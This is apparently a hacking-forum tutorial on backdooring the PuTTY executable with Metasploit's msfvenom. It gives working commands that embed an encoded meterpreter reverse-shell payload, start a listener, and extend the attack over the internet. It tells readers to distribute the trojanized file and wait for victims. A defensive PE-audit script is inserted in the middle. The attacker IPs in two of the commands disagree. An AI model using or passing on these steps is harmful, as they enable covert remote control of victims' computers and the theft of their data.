x32x01
ADMINISTRATOR, Staff Member

Today we're going to create a backdoored Windows executable using the Metasploit Framework's msfvenom tool.


How To Backdoor Windows Executables Using Metasploit

First, make sure Metasploit is already installed.

If you're using Mac/Linux you can install Metasploit by using this method. If you're using Kali Linux, Metasploit is pre-installed.

For LAN/Wifi Networks:

Now follow me step by step:
Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)

1- Open a terminal and download PuTTY using wget.
Code:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in the root directory when I used the above command, so putty.exe was downloaded into /root/.
Now use msfvenom to backdoor this executable with the following command.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe

[Screenshot of the msfvenom output, 2016-12-08]

The above command generates an EXE file named evilputty.exe. This is our backdoored executable.

3- Start Metasploit.
Code:
msfconsole

4- Start Metasploit's reverse handler to receive the reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit

5- Distribute this evilputty.exe file on your LAN/Wi-Fi network and wait for the victim. When the victim opens evilputty.exe, you will get a reverse shell on your Metasploit handler. Happy Hacking 🙂
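From the defender's side, the artifact this procedure produces is a copy of a legitimate program whose PE layout no longer matches the publisher's original. The following added example (my own code, not from the original post or from Metasploit) shows how to audit a suspect executable against a trusted copy: it parses the PE section table, flags sections that are absent from the original, sections that are both writable and executable, and an entry point that has moved. Both files are constructed in memory for the demonstration; the section name ".newsec" and the layouts are assumptions, not what any particular tool actually emits.

```python
"""Audit a suspect PE file's section table against a trusted original copy.

Added example (not part of the original post). The two PE images below are
constructed headers only, not real PuTTY binaries.
"""
import hashlib
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Return the entry-point RVA and the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    # AddressOfEntryPoint is at offset 16 of the optional header (PE32 and PE32+)
    entry = struct.unpack_from("<I", data, coff + 20 + 16)[0]
    sections = []
    off = coff + 20 + opt_size
    for _ in range(num_sections):
        fields = struct.unpack_from(SECTION_FMT, data, off)
        name, vsize, vaddr, chars = fields[0], fields[1], fields[2], fields[9]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vaddr": vaddr, "vsize": vsize, "chars": chars})
        off += 40
    return {"entry": entry, "sections": sections}


def section_for(rva: int, sections: list) -> str:
    """Name of the section that contains the given RVA, or '<none>'."""
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + max(s["vsize"], 1):
            return s["name"]
    return "<none>"


def audit(original: bytes, suspect: bytes) -> list:
    """Compare a suspect PE against a trusted copy; return human-readable findings."""
    findings = []
    if hashlib.sha256(original).digest() == hashlib.sha256(suspect).digest():
        return findings  # byte-identical: nothing to report
    findings.append("file hash differs from the trusted copy")
    o, s = parse_pe(original), parse_pe(suspect)
    if len(s["sections"]) != len(o["sections"]):
        findings.append(f"section count changed from {len(o['sections'])} to {len(s['sections'])}")
    o_names = {sec["name"] for sec in o["sections"]}
    for sec in s["sections"]:
        if sec["name"] not in o_names:
            findings.append(f"new section {sec['name']!r} not present in original")
        if sec["chars"] & IMAGE_SCN_MEM_EXECUTE and sec["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {sec['name']!r} is both writable and executable")
    if o["entry"] != s["entry"]:
        findings.append(f"entry point moved from {o['entry']:#x} "
                        f"({section_for(o['entry'], o['sections'])}) to {s['entry']:#x} "
                        f"({section_for(s['entry'], s['sections'])})")
    return findings


def build_pe(sections: list, entry: int) -> bytes:
    """Construct a minimal PE32 header (no section data) for the demonstration."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)       # e_lfanew: PE header follows the DOS header
    opt = bytearray(224)                        # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)       # Magic: PE32
    struct.pack_into("<I", opt, 16, entry)      # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    table = b"".join(
        struct.pack(SECTION_FMT, name.ljust(8, b"\0"), vsize, vaddr, 0, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


CODE = 0x00000020 | 0x40000000 | IMAGE_SCN_MEM_EXECUTE   # code, readable, executable
DATA = 0x00000040 | 0x40000000 | IMAGE_SCN_MEM_WRITE     # initialized data, read/write
RDATA = 0x00000040 | 0x40000000                          # initialized data, read-only

# Constructed "trusted" layout: a normal three-section image
TRUSTED = build_pe([(b".text", 0x1000, 0x5000, CODE),
                    (b".rdata", 0x6000, 0x1000, RDATA),
                    (b".data", 0x7000, 0x1000, DATA)], entry=0x1100)
# Constructed "tampered" copy: an extra RWX section and an entry point inside it
# (the name ".newsec" is an assumption for this demo, not a known tool signature)
TAMPERED = build_pe([(b".text", 0x1000, 0x5000, CODE),
                     (b".rdata", 0x6000, 0x1000, RDATA),
                     (b".data", 0x7000, 0x1000, DATA),
                     (b".newsec", 0x8000, 0x1000, CODE | IMAGE_SCN_MEM_WRITE)], entry=0x8000)

if __name__ == "__main__":
    for line in audit(TRUSTED, TAMPERED):
        print("FINDING:", line)
```

To use this on real files, read the publisher's signed download and the suspect copy as bytes and pass them to audit(); a clean result is the hash match, and any finding is grounds to quarantine the file and compare it against the vendor's published checksum or Authenticode signature.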

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.

Follow my tutorial on port forwarding for a better understanding of how Metasploit works over the internet.

Once you have forwarded and opened your port, run:
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST="YOUR PUBLIC IP ADDRESS" LPORT=5555 > evilputty.exe

Your public IP address might not be static; in that case you should use a NO-IP dynamic DNS hostname to get a stable address.

Simply use your NO-IP hostname as the LHOST value, e.g. LHOST=example.noip.com

If you have any questions about port forwarding or attacking over a WAN network, don't forget to comment below!